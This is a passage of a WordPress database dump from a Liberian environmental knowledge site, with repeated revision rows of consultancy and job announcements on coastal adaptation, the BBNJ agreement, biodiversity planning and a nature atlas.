deliver recommendations during the workshop. This entails a critical assessment of the accuracy and completeness of the reports under review. The validation process aims to identify inconsistencies, errors, and gaps in the methodological approaches used during both the data collection and analysis processes','Job Title: National Climate Change and Coastal Adaptation Specialist','','inherit','closed','closed','','5530-revision-v1','','','2025-07-22 09:32:39','2025-07-22 09:32:39','',5530,'https://ekmsliberia.info/?p=5531',0,'revision','',0),(5532,38,'2025-07-22 09:36:36','2025-07-22 09:36:36','','Final_ToR_National Consultan-Validation Workshop-t-MCA & VAM_07.18.25 (1)','','inherit','open','closed','','final_tor_national-consultan-validation-workshop-t-mca-vam_07-18-25-1','','','2025-07-22 09:36:36','2025-07-22 09:36:36','',0,'https://ekmsliberia.info/wp-content/uploads/2025/07/Final_ToR_National-Consultan-Validation-Workshop-t-MCA-VAM_07.18.25-1.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5533,38,'2025-07-22 09:36:58','2025-07-22 09:36:58','','Final_ToR_National Consultan-Validation Workshop-t-MCA & VAM_07.18.25 (1)','','inherit','open','closed','','final_tor_national-consultan-validation-workshop-t-mca-vam_07-18-25-1-2','','','2025-07-22 09:36:58','2025-07-22 09:36:58','',0,'https://ekmsliberia.info/wp-content/uploads/2025/07/Final_ToR_National-Consultan-Validation-Workshop-t-MCA-VAM_07.18.25-1-1.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5534,38,'2025-07-22 09:38:11','2025-07-22 09:38:11','<h5><strong>PROJECT BACKGROUND</strong></h5>\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include 1) Strengthening Institutional Capacity for Climate Change Adaptation Planning, 2) Supporting Innovative Technologies for Climate Information and Communication Management, 3) Introducing Hybrid Adaptation Solutions, and 4) Supporting Resilient Livelihood Diversification through Training and Improved Access to Finance. The majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n<div>\r\n<h5><b>OBJECTIVE OF THE ASSIGNMENT</b></h5>\r\n</div>\r\nThe objective of this consultancy is to document the validation process and deliver recommendations during the workshop. This entails a critical assessment of the accuracy and completeness of the reports under review. The validation process aims to identify inconsistencies, errors, and gaps in the methodological approaches used during both the data collection and analysis processes\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/Final_ToR_National-Consultan-Validation-Workshop-t-MCA-VAM_07.18.25-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Job Title: National Climate Change and Coastal Adaptation Specialist','','inherit','closed','closed','','5530-revision-v1','','','2025-07-22 09:38:11','2025-07-22 09:38:11','',5530,'https://ekmsliberia.info/?p=5534',0,'revision','',0),(5536,38,'2025-07-31 16:34:12','2025-07-31 16:34:12','<strong>BACKGROUND:</strong>\r\n\r\nThe United Nations Convention on the Law of the Sea (UNCLOS), adopted in 1982, sets out the legal framework within which all activities in the oceans and seas must be carried out. It was then supplemented by two implementing agreements. Although UNCLOS contains provisions for the protection and preservation of the marine environment and the sustainable management of ocean resources, the United Nations (UN) General Assembly recognized that there was a need for the comprehensive legal regime under UNCLOS to better address the conservation and sustainable use of marine biodiversity of Areas Beyound Naitonal Judrisdation (ABNJ). Ultimately, this recognition culminated in the adoption of the United Nations Convention on the Law of the Sea on the Conservation and Sustainable Use of Marine Biological Diversity of Areas Beyond National Jurisdiction” (the BBNJ Agreement) on 19 June 2023, after nearly two decades of negotiations under various format. The BBNJ Agreement is the outcome of a long, iterative process that was initiated by the United Nations General Assembly (UNGA) in 2004. This process was completed with the adoption of the Agreement at the fifth session of the Intergovernmental conference on an international legally binding instrument under UNCLOS on the conservation and sustainable use of marine biological diversity of areas beyond national jurisdiction, in June 2023. The BBNJ Agreement is the third implementing agreement to the UNCLOS. The Agreement opened for signature in September 2023, s ixty instruments of ratification, approval, acceptance or accession are required for the Agreement to enter into force. The UNGA, in its resolution emphasized the importance of the early entry into force and effective implementation of the Agreement.\r\n\r\n<strong>Objective of the Assignment and Responsibilities</strong>\r\n\r\nThe main objective of this assignment is to conduct a comprehensive situation, institutional and legislative regulatory framework assessment and analysis as imput to the BBNJ initial assessment to support the implementation of the agreement. The Consultant will play a critical role in ensuring the National Assessment and Implementation Readiness strategy for the BBNJ Agreement serves as a working document to guide Liberia’s toward the implementation of the BBNJ agreement. Specifically, the assignment seeks to: Click:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/National-Assessment-and-support-for-Implementation-Readiness-for-the-BBNJ-Agreement.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Consultancy Services Request for Expression of Interest:National Consultant','','publish','closed','closed','','consultancy-services-request-for-expression-of-interestnational-consultant','','','2025-07-31 23:32:37','2025-07-31 23:32:37','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5536',47,'ekms_bulletin','',0),(5538,38,'2025-07-31 16:34:12','2025-07-31 16:34:12','<strong>BACKGROUND:</strong>\r\n\r\nThe United Nations Convention on the Law of the Sea (UNCLOS), adopted in 1982, sets out the legal framework within which all activities in the oceans and seas must be carried out. It was then supplemented by two implementing agreements. Although UNCLOS contains provisions for the protection and preservation of the marine environment and the sustainable management of ocean resources, the United Nations (UN) General Assembly recognized that there was a need for the comprehensive legal regime under UNCLOS to better address the conservation and sustainable use of marine biodiversity of Areas Beyound Naitonal Judrisdation (ABNJ). Ultimately, this recognition culminated in the adoption of the United Nations Convention on the Law of the Sea on the Conservation and Sustainable Use of Marine Biological Diversity of Areas Beyond National Jurisdiction” (the BBNJ Agreement) on 19 June 2023, after nearly two decades of negotiations under various format. The BBNJ Agreement is the outcome of a long, iterative process that was initiated by the United Nations General Assembly (UNGA) in 2004. This process was completed with the adoption of the Agreement at the fifth session of the Intergovernmental conference on an international legally binding instrument under UNCLOS on the conservation and sustainable use of marine biological diversity of areas beyond national jurisdiction, in June 2023. The BBNJ Agreement is the third implementing agreement to the UNCLOS. The Agreement opened for signature in September 2023, s ixty instruments of ratification, approval, acceptance or accession are required for the Agreement to enter into force. The UNGA, in its resolution emphasized the importance of the early entry into force and effective implementation of the Agreement.\r\n\r\n<strong>Objective of the Assignment and Responsibilities</strong>\r\n\r\nThe main objective of this assignment is to conduct a comprehensive situation, institutional and legislative regulatory framework assessment and analysis as imput to the BBNJ initial assessment to support the implementation of the agreement. The Consultant will play a critical role in ensuring the National Assessment and Implementation Readiness strategy for the BBNJ Agreement serves as a working document to guide Liberia’s toward the implementation of the BBNJ agreement. Specifically, the assignment seeks to: Click:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/National-Assessment-and-support-for-Implementation-Readiness-for-the-BBNJ-Agreement.-.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Consultancy Services Request for Expression of Interest:National Consultant','','inherit','closed','closed','','5536-revision-v1','','','2025-07-31 16:34:12','2025-07-31 16:34:12','',5536,'https://ekmsliberia.info/?p=5538',0,'revision','',0),(5539,38,'2025-07-31 17:10:31','2025-07-31 17:10:31','<a id=\"va-detail-head0\" class=\"va-details-title\" href=\"https://jobs.unops.org/pages/viewvacancy/VADetails.aspx?id=30426#0\">Background Information - Job-specific</a>\r\n\r\nThe United Nations Environment Programme (UNEP) is the leading global environmental authority that sets the global environmental agenda, promotes the coherent implementation of the environmental dimension of sustainable development within the United Nations system and serves as an authoritative advocate for the global environment. UNEP\'s mandate is to coordinate the development of environmental policy consensus by keeping the global environment under review and bringing emerging issues to the attention of governments and the international community for action.\r\n\r\nThe <a href=\"https://nbsapaccelerator.org/\">NBSAP Accelerator Partnership</a> is a country-led global initiative to support the development and implementation of ambitious National Biodiversity Strategies and Action Plans (NBSAP) and collectively achieve the goals and targets of the Global Biodiversity Framework (GBF) and, ultimately, the global vision of living in harmony with nature by 2050. Under the leadership of the governments of Colombia and Germany, the NBSAP Accelerator Partnership brings together countries with a Whole of Government and a Whole of Society approach to strengthen global, regional, and national ambition on biodiversity action. The NBSAP Accelerator Partnership is raising the profile of NBSAPs and promoting nature-positive action, fast tracking implementation support through a matchmaking service, increasing access to expertise, knowledge, and capacity development and providing coordination and facilitation support to countries/regions.\r\n<h4>UNOPS is seeking a Technical Advisor – Environmental (Facilitator) to advance the work of the NBSAP Accelerator Partnership work with the effective delivery of assigned tasks below.Click<a href=\"https://jobs.unops.org/pages/viewvacancy/VADetails.aspx?id=30426\" target=\"_blank\" rel=\"noopener\">Apply</a></h4>','Technical Advisor – Environmental (Facilitator)','','publish','closed','closed','','technical-advisor-environmental-facilitator','','','2025-07-31 23:13:08','2025-07-31 23:13:08','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5539',46,'ekms_bulletin','',0),(5540,38,'2025-07-31 17:10:31','2025-07-31 17:10:31','<a id=\"va-detail-head0\" class=\"va-details-title\" href=\"https://jobs.unops.org/pages/viewvacancy/VADetails.aspx?id=30426#0\">Background Information - Job-specific</a>\r\n\r\nThe United Nations Environment Programme (UNEP) is the leading global environmental authority that sets the global environmental agenda, promotes the coherent implementation of the environmental dimension of sustainable development within the United Nations system and serves as an authoritative advocate for the global environment. UNEP\'s mandate is to coordinate the development of environmental policy consensus by keeping the global environment under review and bringing emerging issues to the attention of governments and the international community for action.\r\n\r\nThe <a href=\"https://nbsapaccelerator.org/\">NBSAP Accelerator Partnership</a> is a country-led global initiative to support the development and implementation of ambitious National Biodiversity Strategies and Action Plans (NBSAP) and collectively achieve the goals and targets of the Global Biodiversity Framework (GBF) and, ultimately, the global vision of living in harmony with nature by 2050. Under the leadership of the governments of Colombia and Germany, the NBSAP Accelerator Partnership brings together countries with a Whole of Government and a Whole of Society approach to strengthen global, regional, and national ambition on biodiversity action. The NBSAP Accelerator Partnership is raising the profile of NBSAPs and promoting nature-positive action, fast tracking implementation support through a matchmaking service, increasing access to expertise, knowledge, and capacity development and providing coordination and facilitation support to countries/regions.\r\n\r\nUNOPS is seeking a Technical Advisor – Environmental (Facilitator) to advance the work of the NBSAP Accelerator Partnership work with the effective delivery of assigned tasks below.Click<a href=\"https://jobs.unops.org/pages/viewvacancy/VADetails.aspx?id=30426\" target=\"_blank\" rel=\"noopener\">Apply</a>','Technical Advisor – Environmental (Facilitator)','','inherit','closed','closed','','5539-revision-v1','','','2025-07-31 17:10:31','2025-07-31 17:10:31','',5539,'https://ekmsliberia.info/?p=5540',0,'revision','',0),(5541,38,'2025-07-31 23:12:57','2025-07-31 23:12:57','<a id=\"va-detail-head0\" class=\"va-details-title\" href=\"https://jobs.unops.org/pages/viewvacancy/VADetails.aspx?id=30426#0\">Background Information - Job-specific</a>\n\nThe United Nations Environment Programme (UNEP) is the leading global environmental authority that sets the global environmental agenda, promotes the coherent implementation of the environmental dimension of sustainable development within the United Nations system and serves as an authoritative advocate for the global environment. UNEP\'s mandate is to coordinate the development of environmental policy consensus by keeping the global environment under review and bringing emerging issues to the attention of governments and the international community for action.\n\nThe <a href=\"https://nbsapaccelerator.org/\">NBSAP Accelerator Partnership</a> is a country-led global initiative to support the development and implementation of ambitious National Biodiversity Strategies and Action Plans (NBSAP) and collectively achieve the goals and targets of the Global Biodiversity Framework (GBF) and, ultimately, the global vision of living in harmony with nature by 2050. Under the leadership of the governments of Colombia and Germany, the NBSAP Accelerator Partnership brings together countries with a Whole of Government and a Whole of Society approach to strengthen global, regional, and national ambition on biodiversity action. The NBSAP Accelerator Partnership is raising the profile of NBSAPs and promoting nature-positive action, fast tracking implementation support through a matchmaking service, increasing access to expertise, knowledge, and capacity development and providing coordination and facilitation support to countries/regions.\n<h4>UNOPS is seeking a Technical Advisor – Environmental (Facilitator) to advance the work of the NBSAP Accelerator Partnership work with the effective delivery of assigned tasks below.Click<a href=\"https://jobs.unops.org/pages/viewvacancy/VADetails.aspx?id=30426\" target=\"_blank\" rel=\"noopener\">Apply</a></h4>','Technical Advisor – Environmental (Facilitator)','','inherit','closed','closed','','5539-autosave-v1','','','2025-07-31 23:12:57','2025-07-31 23:12:57','',5539,'https://ekmsliberia.info/?p=5541',0,'revision','',0),(5542,38,'2025-07-31 23:13:08','2025-07-31 23:13:08','<a id=\"va-detail-head0\" class=\"va-details-title\" href=\"https://jobs.unops.org/pages/viewvacancy/VADetails.aspx?id=30426#0\">Background Information - Job-specific</a>\r\n\r\nThe United Nations Environment Programme (UNEP) is the leading global environmental authority that sets the global environmental agenda, promotes the coherent implementation of the environmental dimension of sustainable development within the United Nations system and serves as an authoritative advocate for the global environment. UNEP\'s mandate is to coordinate the development of environmental policy consensus by keeping the global environment under review and bringing emerging issues to the attention of governments and the international community for action.\r\n\r\nThe <a href=\"https://nbsapaccelerator.org/\">NBSAP Accelerator Partnership</a> is a country-led global initiative to support the development and implementation of ambitious National Biodiversity Strategies and Action Plans (NBSAP) and collectively achieve the goals and targets of the Global Biodiversity Framework (GBF) and, ultimately, the global vision of living in harmony with nature by 2050. Under the leadership of the governments of Colombia and Germany, the NBSAP Accelerator Partnership brings together countries with a Whole of Government and a Whole of Society approach to strengthen global, regional, and national ambition on biodiversity action. The NBSAP Accelerator Partnership is raising the profile of NBSAPs and promoting nature-positive action, fast tracking implementation support through a matchmaking service, increasing access to expertise, knowledge, and capacity development and providing coordination and facilitation support to countries/regions.\r\n<h4>UNOPS is seeking a Technical Advisor – Environmental (Facilitator) to advance the work of the NBSAP Accelerator Partnership work with the effective delivery of assigned tasks below.Click<a href=\"https://jobs.unops.org/pages/viewvacancy/VADetails.aspx?id=30426\" target=\"_blank\" rel=\"noopener\">Apply</a></h4>','Technical Advisor – Environmental (Facilitator)','','inherit','closed','closed','','5539-revision-v1','','','2025-07-31 23:13:08','2025-07-31 23:13:08','',5539,'https://ekmsliberia.info/?p=5542',0,'revision','',0),(5543,38,'2025-07-31 23:24:50','2025-07-31 23:24:50','','National Assessment and support for Implementation Readiness for the BBNJ Agreement','','inherit','open','closed','','national-assessment-and-support-for-implementation-readiness-for-the-bbnj-agreement','','','2025-07-31 23:24:50','2025-07-31 23:24:50','',0,'https://ekmsliberia.info/wp-content/uploads/2025/07/National-Assessment-and-support-for-Implementation-Readiness-for-the-BBNJ-Agreement.pdf',0,'attachment','application/pdf',0),(5544,38,'2025-07-31 23:32:04','2025-07-31 23:32:04','<strong>BACKGROUND:</strong>\r\n\r\nThe United Nations Convention on the Law of the Sea (UNCLOS), adopted in 1982, sets out the legal framework within which all activities in the oceans and seas must be carried out. It was then supplemented by two implementing agreements. Although UNCLOS contains provisions for the protection and preservation of the marine environment and the sustainable management of ocean resources, the United Nations (UN) General Assembly recognized that there was a need for the comprehensive legal regime under UNCLOS to better address the conservation and sustainable use of marine biodiversity of Areas Beyound Naitonal Judrisdation (ABNJ). Ultimately, this recognition culminated in the adoption of the United Nations Convention on the Law of the Sea on the Conservation and Sustainable Use of Marine Biological Diversity of Areas Beyond National Jurisdiction” (the BBNJ Agreement) on 19 June 2023, after nearly two decades of negotiations under various format. The BBNJ Agreement is the outcome of a long, iterative process that was initiated by the United Nations General Assembly (UNGA) in 2004. This process was completed with the adoption of the Agreement at the fifth session of the Intergovernmental conference on an international legally binding instrument under UNCLOS on the conservation and sustainable use of marine biological diversity of areas beyond national jurisdiction, in June 2023. The BBNJ Agreement is the third implementing agreement to the UNCLOS. The Agreement opened for signature in September 2023, s ixty instruments of ratification, approval, acceptance or accession are required for the Agreement to enter into force. The UNGA, in its resolution emphasized the importance of the early entry into force and effective implementation of the Agreement.\r\n\r\n<strong>Objective of the Assignment and Responsibilities</strong>\r\n\r\nThe main objective of this assignment is to conduct a comprehensive situation, institutional and legislative regulatory framework assessment and analysis as imput to the BBNJ initial assessment to support the implementation of the agreement. The Consultant will play a critical role in ensuring the National Assessment and Implementation Readiness strategy for the BBNJ Agreement serves as a working document to guide Liberia’s toward the implementation of the BBNJ agreement. Specifically, the assignment seeks to: Click:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/07/National-Assessment-and-support-for-Implementation-Readiness-for-the-BBNJ-Agreement.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>','Consultancy Services Request for Expression of Interest:National Consultant','','inherit','closed','closed','','5536-revision-v1','','','2025-07-31 23:32:04','2025-07-31 23:32:04','',5536,'https://ekmsliberia.info/?p=5544',0,'revision','',0),(5545,38,'2025-08-03 21:03:14','2025-08-03 21:03:14','<strong>BACKGROUND</strong>\r\n\r\nLiberia is endowed with rich biodiversity, unique ecosystems, and stunning natural landscapes. Its natural capital includes over 40% of the remaining Upper Guinean Rainforest, extensive river systems, wetlands, mangroves, and a vibrant coastline. These ecosystems support a wide range of endemic and endangered species, such as the pygmy hippopotamus, forest elephants, and western chimpanzees. Liberia’s forests also play a critical role in regional climate regulation and carbon sequestration, making them globally significant for climate action.\r\n\r\nIn addition to its ecological value, Liberia’s natural resources present untapped opportunities for sustainable investment. Sectors such as ecotourism, sustainable forestry, carbon finance, and renewable energy offer potential for green growth, job creation, and community development. However, these assets remain under-documented and under-promoted, limiting their contribution to national development and global conservation efforts. This underrepresentation hinders the country’s ability to harness its ecological assets for sustainable economic growth, climate resilience, and community development.\r\n\r\n<strong>Objective of the Assignment and Responsibilities</strong>\r\n\r\nThe main objective of this assignment is to support the development, promotion, and dissemination of a high-impact, visually compelling, and content-rich Atlas of the Natural Beauty and Wonders of Liberia. The Communications Specialist will play a critical role in ensuring the Atlas serves as a flagship communication product that enhances Liberia’s environmental visibility, supports advocacy efforts, and attracts sustainable investment at national and international levels.\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/08/Draft-ToR-Comms-Specialist-Atlas-COP30.docx\">Download</a>','CALL FOR EXPRESSION OF INTEREST: National Communications Specialist','','publish','closed','closed','','call-for-expression-of-interest-national-communications-specialist','','','2025-08-03 21:03:14','2025-08-03 21:03:14','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5545',45,'ekms_bulletin','',0),(5546,38,'2025-08-03 21:00:08','2025-08-03 21:00:08','<strong>BACKGROUND</strong>\r\n\r\nLiberia is endowed with rich biodiversity, unique ecosystems, and stunning natural landscapes. Its natural capital includes over 40% of the remaining Upper Guinean Rainforest, extensive river systems, wetlands, mangroves, and a vibrant coastline. These ecosystems support a wide range of endemic and endangered species, such as the pygmy hippopotamus, forest elephants, and western chimpanzees. Liberia’s forests also play a critical role in regional climate regulation and carbon sequestration, making them globally significant for climate action.\r\n\r\nIn addition to its ecological value, Liberia’s natural resources present untapped opportunities for sustainable investment. Sectors such as ecotourism, sustainable forestry, carbon finance, and renewable energy offer potential for green growth, job creation, and community development. However, these assets remain under-documented and under-promoted, limiting their contribution to national development and global conservation efforts. This underrepresentation hinders the country’s ability to harness its ecological assets for sustainable economic growth, climate resilience, and community development.\r\n\r\n<strong>Objective of the Assignment and Responsibilities</strong>\r\n\r\nThe main objective of this assignment is to support the development, promotion, and dissemination of a high-impact, visually compelling, and content-rich Atlas of the Natural Beauty and Wonders of Liberia. The Communications Specialist will play a critical role in ensuring the Atlas serves as a flagship communication product that enhances Liberia’s environmental visibility, supports advocacy efforts, and attracts sustainable investment at national and international levels.\r\n\r\nClick to:','CALL FOR EXPRESSION OF INTEREST: National Communications Specialist','','inherit','closed','closed','','5545-revision-v1','','','2025-08-03 21:00:08','2025-08-03 21:00:08','',5545,'https://ekmsliberia.info/?p=5546',0,'revision','',0),(5547,38,'2025-08-03 21:01:16','2025-08-03 21:01:16','','Draft ToR Comms Specialist Atlas COP30','','inherit','open','closed','','draft-tor-comms-specialist-atlas-cop30','','','2025-08-03 21:01:16','2025-08-03 21:01:16','',0,'https://ekmsliberia.info/wp-content/uploads/2025/08/Draft-ToR-Comms-Specialist-Atlas-COP30.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5548,38,'2025-08-03 21:03:14','2025-08-03 21:03:14','<strong>BACKGROUND</strong>\r\n\r\nLiberia is endowed with rich biodiversity, unique ecosystems, and stunning natural landscapes. Its natural capital includes over 40% of the remaining Upper Guinean Rainforest, extensive river systems, wetlands, mangroves, and a vibrant coastline. These ecosystems support a wide range of endemic and endangered species, such as the pygmy hippopotamus, forest elephants, and western chimpanzees. Liberia’s forests also play a critical role in regional climate regulation and carbon sequestration, making them globally significant for climate action.\r\n\r\nIn addition to its ecological value, Liberia’s natural resources present untapped opportunities for sustainable investment. Sectors such as ecotourism, sustainable forestry, carbon finance, and renewable energy offer potential for green growth, job creation, and community development. However, these assets remain under-documented and under-promoted, limiting their contribution to national development and global conservation efforts. This underrepresentation hinders the country’s ability to harness its ecological assets for sustainable economic growth, climate resilience, and community development.\r\n\r\n<strong>Objective of the Assignment and Responsibilities</strong>\r\n\r\nThe main objective of this assignment is to support the development, promotion, and dissemination of a high-impact, visually compelling, and content-rich Atlas of the Natural Beauty and Wonders of Liberia. The Communications Specialist will play a critical role in ensuring the Atlas serves as a flagship communication product that enhances Liberia’s environmental visibility, supports advocacy efforts, and attracts sustainable investment at national and international levels.\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/08/Draft-ToR-Comms-Specialist-Atlas-COP30.docx\">Download</a>','CALL FOR EXPRESSION OF INTEREST: National Communications Specialist','','inherit','closed','closed','','5545-revision-v1','','','2025-08-03 21:03:14','2025-08-03 21:03:14','',5545,'https://ekmsliberia.info/?p=5548',0,'revision','',0),(5549,38,'2025-08-03 21:17:23','2025-08-03 21:17:23','<strong>BACKGROUND</strong>\r\n\r\nLiberia is endowed with rich biodiversity, unique ecosystems, and stunning natural landscapes. Its natural capital includes over 40% of the remaining Upper Guinean Rainforest, extensive river systems, wetlands, mangroves, and a vibrant coastline. These ecosystems support a wide range of endemic and endangered species, such as the pygmy hippopotamus, forest elephants, and western chimpanzees. Liberia’s forests also play a critical role in regional climate regulation and carbon sequestration, making them globally significant for climate action.\r\n\r\nIn addition to its ecological value, Liberia’s natural resources present untapped opportunities for sustainable investment. Sectors such as ecotourism, sustainable forestry, carbon finance, and renewable energy offer potential for green growth, job creation, and community development. However, these assets remain under-documented and under-promoted, limiting their contribution to national development and global conservation efforts. This underrepresentation hinders the country’s ability to harness its ecological assets for sustainable economic growth, climate resilience, and community development.\r\n\r\n<strong>Objective of the Assignment and Responsibilities</strong>\r\n\r\nThe objective of this assignment is to develop a high-quality, visually compelling, and content-rich <strong><em>Atlas of the Natural Beauty and Wonders of Liberia</em></strong> that documents and promotes the country’s most valuable ecological and cultural landscapes. The Atlas will serve as a strategic tool to:\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/08/Draft-ToR-Atlas-COP30.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','CALL FOR EXPRESSION OF INTEREST: Consultancy Services for the Development of an Atlas Showcasing the Natural Beauty and Wonders of Liberia (National Consulting Firm)','','publish','closed','closed','','call-for-expression-of-interest-consultancy-services-for-the-development-of-an-atlas-showcasing-the-natural-beauty-and-wonders-of-liberia-national-consulting-firm','','','2025-08-03 21:17:23','2025-08-03 21:17:23','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5549',44,'ekms_bulletin','',0),(5550,38,'2025-08-03 21:12:24','2025-08-03 21:12:24','<strong>BACKGROUND</strong>\r\n\r\nLiberia is endowed with rich biodiversity, unique ecosystems, and stunning natural landscapes. Its natural capital includes over 40% of the remaining Upper Guinean Rainforest, extensive river systems, wetlands, mangroves, and a vibrant coastline. These ecosystems support a wide range of endemic and endangered species, such as the pygmy hippopotamus, forest elephants, and western chimpanzees. Liberia’s forests also play a critical role in regional climate regulation and carbon sequestration, making them globally significant for climate action.\r\n\r\nIn addition to its ecological value, Liberia’s natural resources present untapped opportunities for sustainable investment. Sectors such as ecotourism, sustainable forestry, carbon finance, and renewable energy offer potential for green growth, job creation, and community development. However, these assets remain under-documented and under-promoted, limiting their contribution to national development and global conservation efforts. This underrepresentation hinders the country’s ability to harness its ecological assets for sustainable economic growth, climate resilience, and community development.\r\n\r\n<strong>Objective of the Assignment and Responsibilities</strong>\r\n\r\nThe objective of this assignment is to develop a high-quality, visually compelling, and content-rich <strong><em>Atlas of the Natural Beauty and Wonders of Liberia</em></strong> that documents and promotes the country’s most valuable ecological and cultural landscapes. The Atlas will serve as a strategic tool to:','CALL FOR EXPRESSION OF INTEREST: Consultancy Services for the Development of an Atlas Showcasing the Natural Beauty and Wonders of Liberia (National Consulting Firm)','','inherit','closed','closed','','5549-revision-v1','','','2025-08-03 21:12:24','2025-08-03 21:12:24','',5549,'https://ekmsliberia.info/?p=5550',0,'revision','',0),(5551,38,'2025-08-03 21:15:04','2025-08-03 21:15:04','','Draft ToR Atlas COP30','','inherit','open','closed','','draft-tor-atlas-cop30-2','','','2025-08-03 21:15:04','2025-08-03 21:15:04','',0,'https://ekmsliberia.info/wp-content/uploads/2025/08/Draft-ToR-Atlas-COP30.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5552,38,'2025-08-03 21:17:23','2025-08-03 21:17:23','<strong>BACKGROUND</strong>\r\n\r\nLiberia is endowed with rich biodiversity, unique ecosystems, and stunning natural landscapes. Its natural capital includes over 40% of the remaining Upper Guinean Rainforest, extensive river systems, wetlands, mangroves, and a vibrant coastline. These ecosystems support a wide range of endemic and endangered species, such as the pygmy hippopotamus, forest elephants, and western chimpanzees. Liberia’s forests also play a critical role in regional climate regulation and carbon sequestration, making them globally significant for climate action.\r\n\r\nIn addition to its ecological value, Liberia’s natural resources present untapped opportunities for sustainable investment. Sectors such as ecotourism, sustainable forestry, carbon finance, and renewable energy offer potential for green growth, job creation, and community development. However, these assets remain under-documented and under-promoted, limiting their contribution to national development and global conservation efforts. This underrepresentation hinders the country’s ability to harness its ecological assets for sustainable economic growth, climate resilience, and community development.\r\n\r\n<strong>Objective of the Assignment and Responsibilities</strong>\r\n\r\nThe objective of this assignment is to develop a high-quality, visually compelling, and content-rich <strong><em>Atlas of the Natural Beauty and Wonders of Liberia</em></strong> that documents and promotes the country’s most valuable ecological and cultural landscapes. The Atlas will serve as a strategic tool to:\r\n\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/08/Draft-ToR-Atlas-COP30.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','CALL FOR EXPRESSION OF INTEREST: Consultancy Services for the Development of an Atlas Showcasing the Natural Beauty and Wonders of Liberia (National Consulting Firm)','','inherit','closed','closed','','5549-revision-v1','','','2025-08-03 21:17:23','2025-08-03 21:17:23','',5549,'https://ekmsliberia.info/?p=5552',0,'revision','',0),(5553,38,'2025-08-04 16:56:28','2025-08-04 16:56:28','<strong>PROJECT BACKGROUND</strong>\r\n\r\nThe EPA is Liberia\'s principal authority for environmental management. It coordinates, monitors, supervises, and consults with relevant stakeholders and sector Ministries, Agencies, and Commissions (MACs) on all activities related to protecting the environment and sustainable use of its natural resources.\r\n\r\nThe Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity. It is financed by a GEF Trust Fund grant and co-financed by UNDP and the GoL.\r\n\r\nThe project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include the following:\r\n\r\n<strong>Component 1:</strong> Strengthening Institutional Capacity for Climate Change Adaptation Planning\r\n\r\n<strong>Component 2:</strong> Supporting Innovative Technologies for Climate Information and Communication\r\nManagement\r\n\r\n<strong>Component 3:</strong> Introducing Engineered Hybrid Adaptation Solutions\r\n\r\n<strong>Component 4:</strong> Supporting Resilient Livelihood Diversification through Training and Improved\r\nAccess to Finance.\r\nThe majority of the above interventions will target all coastal counties in Liberia. In contrast, hybrid adaptation interventions will be explicitly implemented in Sinoe County, one of the country’s most vulnerable coastal counties.\r\n\r\nThe impacts of climate change, combined with non-climatic drivers, such as sand mining, the expansion of agricultural areas, unsustainable fishing, pollution, and inadequate drainage systems, compromise the resilience of Liberian communities\' ecosystems along the coastline. Consequently, local communities and ecosystems are experiencing increased coastal flooding and erosion, saltwater intrusion into groundwater supplies, waterlogging of inland areas, and sedimentation of rivers and freshwater resources due to Sea Level Rise (SLR) and higher-intensity rainfall events. The vulnerability of communities and ecosystems occurs through I) inundation and consequent damage of coastal infrastructure, II) loss of fishery and agriculture-dependent livelihoods, III) decrease in stable income generation for coastal communities, IV) increase in conflict and competition over resources within communities, V) decrease in food and nutrition security, VI) increased risk of vector- and waterborne diseases through waterlogging, and VII) increased pressure on surrounding ecosystems to compensate for the reduced provision of services from coastal, wetland and mangrove ecosystems. In addition, the vulnerability of Liberia’s coastal communities and their resilience to climate change, particularly in Sinoe County, is exacerbated by the limited capacity of GoL to provide essential services and adequate support for, among other things, water and sanitation, healthcare, utility-scale energy, and road infrastructure.\r\n\r\nAs a result, coastal communities in Liberia are threatened by damaging floods and erosion, both of which are increasing due to sea level rise and other impacts of climate change, such as increasingly intense rainfall events and the current limited financial and technical capacity at the national and county levels to address these threats.\r\n\r\nClick To: <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/08/Nationanal-Conservation-Oraganization-for-Mangroves-Restoration-ToR.docx\" 